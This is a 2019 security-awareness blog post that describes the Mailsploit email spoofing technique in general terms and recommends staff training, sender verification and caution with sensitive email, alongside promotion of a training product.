Security awareness

Mailsploit: The Undetectable Spoofing Attack [Updated 2019]

Megan Sawle
August 26, 2019 by
Megan Sawle

Pentester Sabri Haddouche just uncovered a major new email spoofing tactic. Named Mailsploit, the technique leverages bugs in email clients and allows hackers to launch undetectable email spoofing attacks. Over 30 email applications are vulnerable to attack, including popular clients like Microsoft Outlook 2016, Apple Mail, Yahoo! Mail and more.

Mailsploit easily passes through email servers and circumvents established spoofing protection tools like DMARC and spam filters. Emails sent with Mailsploit appear to come from totally legitimate senders. In most cases, unless email headers are inspected by technicians, emails sent using Mailsploit are undetectable.

Two year's worth of NIST-aligned training

Two year's worth of NIST-aligned training

Deliver a comprehensive security awareness program using this series' 1- or 2-year program plans.

It gets worse: According to Haddouche, emails sent using Mailsploit are virtually unstoppable at this point in time.

Where Do We Go From Here?

In a post-Mailsploit world, it is now more important than ever to avoid sending sensitive and confidential information over email. Email users everywhere must assume no information sent via email is secure.

Here are four ways you can fight Mailsploit and other email-based threats with security awareness training:

1. Teach Your Workforce Email Use Best Practices

Mailsploit is not the first email-based security threat facing your workforce — everyday they receive phishing emails and malware from hackers trying to breach your systems. Many of these attacks are developed to circumvent technical controls, leaving it up to your team to spot and prevent hacking attempts. It’s essential your security awareness training program covers email-based threats in detail and reinforces email use best practices.

Want to learn more about phishing? Here's an article on 10 Most Common Phishing Attacks!

2. Ask Your Workforce to Verify Email Sender Identity

Always take time to evaluate emails you receive before replying. If you don’t know the sender or it's unusual for the sender to contact you, find another way to contact the sender other than email.

3. Educate Your Workforce About the Dangers of Sharing Sensitive Information Via Email

Email should never include sensitive information. This was true before the discovery of Mailsploit and remains especially true now. As soon as information leaves your network, you lose control over how the data is used and shared. Always call or find another way to communicate sensitive information.

4. Enroll Your Workforce in Ongoing Security Awareness Training

New security threats like Mailsploit emerge everyday. Enrolling your team in engaging security awareness training will keep them current on these threats and teach them the value of secure behavior.

SecurityIQ by InfoSec Institute integrates security awareness training, phishing simulations and personalized learning in one platform. It self-evolves with employees’ security aptitudes, roles and learning styles to create personalized learning experiences that motivate everyone to care about security and change their behaviors. This gives you more time to patch technical vulnerabilities, while ensuring your human firewall remains secure.

Phishing simulations & training

Phishing simulations & training

Build the knowledge and skills to stay cyber secure at work and home with 2,000+ security awareness resources. Unlock the right subscription plan for you.

Megan Sawle
Megan Sawle

Megan Sawle is a communications and research professional with 10 years of experience in cybersecurity, bioscience and higher education. Megan leads Infosec’s research strategy, leveraging study findings to mature its cybersecurity education offerings and build awareness of cybersecurity diversity and skill shortage challenges. Since joining the team, she’s directed research projects on a wide variety of cybersecurity topics ranging from dark web marketplaces and phishing kits to the Workforce Framework for Cybersecurity (NICE Framework) and the importance of soft skills in cybersecurity roles. Megan is a University of Wisconsin-Stout graduate, an avid equestrian and (very) amateur mycologist.